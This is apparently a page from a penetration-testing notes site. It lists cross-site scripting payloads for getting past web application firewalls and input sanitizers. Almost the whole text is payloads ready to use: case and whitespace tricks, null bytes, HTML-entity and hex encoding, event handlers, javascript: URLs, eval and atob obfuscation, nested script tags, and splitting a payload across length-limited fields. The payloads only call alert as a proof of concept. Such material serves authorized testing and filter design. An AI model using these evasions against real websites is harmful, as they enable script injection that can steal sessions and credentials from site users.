🔭XSS WAF Bypass Trick

Basic Modification

This is our normal payload but now if WAF is blocking <script>,alert,</script> tags, then you can try this.

<script >alert(1)</script>
<script>window['al'+'ert']()</script>
<script>top[`alert`]()</script>
<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>
<ScRipT>alert(1)</sCriPt>
<%00script>alert(1)</script>
<script>al%00ert(1)</script>
<img src=x onerror="js:abc='al'+'ert(1)';eval(abc)" />
<script>window[['a','l','e','r','t'].toString().replaceAll(',',"")]()</script>
<script>window[['conf','irm'].toString().replaceAll(',',"")]()</script>
<script>abc='\x61\x6C\x65\x72\x74';this[abc]()</script>
<script>window['\x61\x6C\x65\x72\x74']()</script>
<script>window[['\x61\x6C\x65\x72\x74'].toString().replaceAll(",","")]()</script>
<script>abc='aLerT()';eval(abc.toLowerCase())</script>
<script>abc='YWxlcnQoKQ==';eval(atob(abc))</script>
<script>abc='CoNFirM()';eval(abc.toLowerCase())</script>

Try giving random whitespaces to bypass WAF.

Try giving random HTML encoded values between Script tags.

Attributes and Tags

<input type ="text" name="input" value="hello">

You can try this payload to fool the website, because as it has <> (closing tag) and the website gets terminated as it

feels like the value is empty.

Try writing XSS test code:

<random tag type="text" name="input" value="><script>alert(1)</script>

Try writing any random tag at starting:

<iNpUt type="text" name="input" value="><script>alert(1)</script>
<input/type="text" name="input" value="><script>alert(1)</script>
<input&#9type="text" name="input" value="><script>alert(1)</script>
<input&#10type="text" name="input" value="><script>alert(1)</script>
<input&#13type="text" name="input" value="><script>alert(1)</script>

Try replacing the space or writing any HTML values between tags

<%00input type="text" name="input" value="><script>alert(1)</script>
<inp%00ut type="text" name="input" value="><script>alert(1)</script>

Try inserting null byte (%00) at different positions

<input t%00ype="text" name="input" value="><script>alert(1)</script>
<input type="text" name="input" value="><script>a%00lert(1)</script>

Null Byte can work on Attribute name and values too..

Event Handlers

<input onsubmit=alert(1)>

A Button which a user is going to click on a page. By working on some JavaScript we can create a button (an event).

Try these alternatives instead on onsubmit (if it doesn’t work)

<audio src="new.mp3" onerror=alert(1)>
<video src="new.mp4" onerror=alert(1)>
<svg width="200" height="100" onload=alert(1)>

These alternatives can also be used if it the HTML used here is HTML5.

Delimiters & Brackets

<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>

Delimiter is one or more character used to separate text

Try using Single & Double quotes

<img onerror=&#34alert(1)&#34src=x>
<img onerror=&#39alert(1)&#39src=x>

Try using encoded values to Bypass

<img onerror=`alert(1)`src=x> Try using backtick or accent

<img onerror=&#96alert(1)&#96src=x>

Can use encoded values in between

<img src=`x`onerror=alert(1)>

Try using ` (grave accent)

Same as Delimiters, Brackets can also help to bypass website or page filters.

By using extra brackets the system can be tricked, and by using double slash it comments out the extra bracket on closing tag.

<input onsubmit=alert(1)<

Open Bracket at the end could also help to bypass

«input onsubmit=alert(1)»

Try using different brackets

&#174input onsubmit=alert(1)&#175

Try using different Characters

Psuedo Protocols

<a href="https://www.google.com">Click Here</a>

It’s a hyperlink where a user goes from one page to another with just one click

Try Injecting a code using Javascript to check XSS

<img src=javascript:alert(1)>
<form action=javascript:alert(1)>
<object data=javascript:alert(1)>
<button
formaction=javascript:alert(1)>
<video src=javascript:alert(1)>

Other attributes also can be used that takes URL as a value..

Existing Javascript & Character Escaping

<script>var a = 'myteststring';</script>js

Try defining a Variable & injecting a payload ‘; alert(1); //

Script will function but the system wont filter because of double slash.

<script>var a = ‘\\’; alert(1); // Escaping character can also be helpful

<script>a\u006cert(1)</script>

Using Unicode Characters like this can help

Dynamic String Construction & Eval()

eval('1 + 1')

This function evaluate to 2. JavaScript contains a function called eval()

eval<script>eval('a\u006cert(1)')</script> ('1 + 1')
<script>eval('al' +'ert(1)')</script>
<script>eval(String.fromCharCode(97, 108, 101,114, 116, 40, 49, 41))</script>

We can use Unicode encoding

if the function is blocked then some actual characters can work. There is another function that can be used in lieu of eval() called fromCharCode().

Meta Refresh & File Renaming

Web browser can automatically refresh the current page after a certain period.

<meta http-equiv="refresh"
content="0;url=javascript:alert(1);">

<script src=”payload.jpg”> Try renaming the source to an image file.

Sanitization & Length Limits

<script><script>alert(1)</script>

Try adding multiple tags. (sometimes application removes first instance of script tag)

<sc<script>ript>alert(1)</script>

Can add any tag for first instance to get filtered by application. If a page is being returned because of the

Length Limit then:

<input type="hidden" name="id" value=""><script>/*">
<input type="hidden" name="checksum" value="*/alert(1)/*">
<input type="hidden" name="status" value="*/</script>"

/* and */ get ignored, so the browser ultimately processes our payload as if it was injected in only one location.

PreviousEffective Payload Generation MethodNextWays I Bypassed Your Web Application Firewall (WAF)

Last updated